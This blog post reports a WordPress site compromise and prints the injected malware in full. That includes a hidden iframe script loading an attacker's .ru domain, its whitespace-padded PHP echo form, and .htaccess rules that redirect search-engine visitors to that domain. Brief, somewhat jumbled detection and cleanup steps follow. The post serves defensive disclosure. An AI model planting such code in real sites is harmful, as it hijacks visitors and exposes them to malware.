encountered a malware on a site

Its the 6th day, one of the site I have been contributing to as an author has been compromised by a cracker out there. The cracker is supposed to be a russian. The malware is a redirection malware and according to current statistics it has compromised total of 92 websites. The malware can infect any website but is mostly capable of compromising wordpress websites.

The script injected by the malware is as follows:
<script type=”text/javascript” language=”javascript” > (function () { var jeit = document.createElement(‘iframe’); jeit.src = ‘http://nylzudwo.ru/count13.php&#8217;; jeit.style.position = ‘absolute’; jeit.style.border = ’0′; jeit.style.height = ’1px’; jeit.style.width = ’1px’; jeit.style.left = ’1px’; jeit.style.top = ’1px’; if (!document.getElementById(‘jeit’)) { document.write(‘<div id=\’jeit\’></div>’); document.getElementById(‘jeit’).appendChild(jeit); }})();</script>
In php files, its seen as the line :
echo ”                                                                                                                                                                                                                           <script type=\”text/javascript\” language=\”javascript\” >                                                                                                                                                                                                                                                          (function () {    var jeit = document.createElement(‘iframe’);    jeit.src = ‘http://nylzudwo.ru/count13.php&#8217;;    jeit.style.position = ‘absolute’;    jeit.style.border = ’0′;    jeit.style.height = ’1px’;    jeit.style.width = ’1px’;    jeit.style.left = ’1px’;    jeit.style.top = ’1px’;    if (!document.getElementById(‘jeit’)) {        document.write(‘<div id=\’jeit\’></div>’);        document.getElementById(‘jeit’).appendChild(jeit);    }})();</script>”;
The main infected files are index.php, index.html. Also .htaccess file can be infected and the .htaccess files gets these lines of code added to them:
#e2aa4e#<IfModule mod_rewrite.c>RewriteEngine OnRewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)RewriteRule ^(.*)$ http://nylzudwo.ru/count13.php [R=301,L]</IfModule>
#/e2aa4e#
Because of this malware, your domain will be blacklisted by Google Safe Browsing. And because of black listing your visitors will get the screen as shown in the above image.
How to detect if your website has been compromised with this malware:

  1. Scan your website at http://sitecheck.sucuri.net/scanner/
  2. Scan your website at http://evuln.com/tools/malware-scanner/
  3. Upgrading wordpress themes/plugins
  4. Use of properly verified third party plugins/themes
  5. Go to https://www.google.com/webmasters/tools
  6. Add your site if you have not added.
  7. If your site is infected, you should see ”

The steps that can be taken to be safe from it are:
What if infected, just remove the malware code, and use google webmaster tool to ask google to review your domain to remove from blacklisted. Steps to put a request of review:
  1. Severe health issues are found on your site. – Check site health“. Click on Check site health. And click on malware detected, Then you will see a button for Request a review.

Comments

Post a Comment

Popular posts from this blog

Automate file upload in Selenium IDE

Image
Selenium IDE is an integrated development environment for Selenium tests. It records your interactions with websites to help you generate and maintain site automation, tests, and remove the need to manually step through repetitive tasks. Selenium IDE can be installed in Google Chrome from  here . For Firefox visit this  link . File upload in Selenium IDE cannot be automated simply by recording from the IDE. Because when we select the file input field, the dialog that opens up is a system window which cannot be controlled by Selenium IDE. Therefore, clicking the input file field to select a file will not work. Also the selected file path is changed to C:\fakepath\filename.extension. So to fix this issue, we need to configure the browser to support file upload and then instead of clicking the input field we set the file using ‘type’ selenium command which is shown below. First, to support file upload in Selenium IDE, configure your browser to support file upload: Visit ‘chrome://
Read more

How To Install and Configure Nextcloud

Image
  Original post: https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-nextcloud-on-ubuntu-20-04 Step 1 – Installing Nextcloud We will be installing Nextcloud using the  Snap  packaging system. This packaging system, available on Ubuntu 20.04 by default, allows organizations to ship software, along with all associated dependencies and configuration, in a self-contained unit with automatic updates. This means that instead of installing and configuring a web and database server and then configuring the Nextcloud app to run on it, we can install the  snap  package which handles the underlying systems automatically. To download the Nextcloud snap package and install it on the system, type: sudo snap install nextcloud Copy The Nextcloud package will be downloaded and installed on your server. You can confirm that the installation process was successful by listing the changes associated with the snap: snap changes nextcloud Copy Output ID Status Spawn
Read more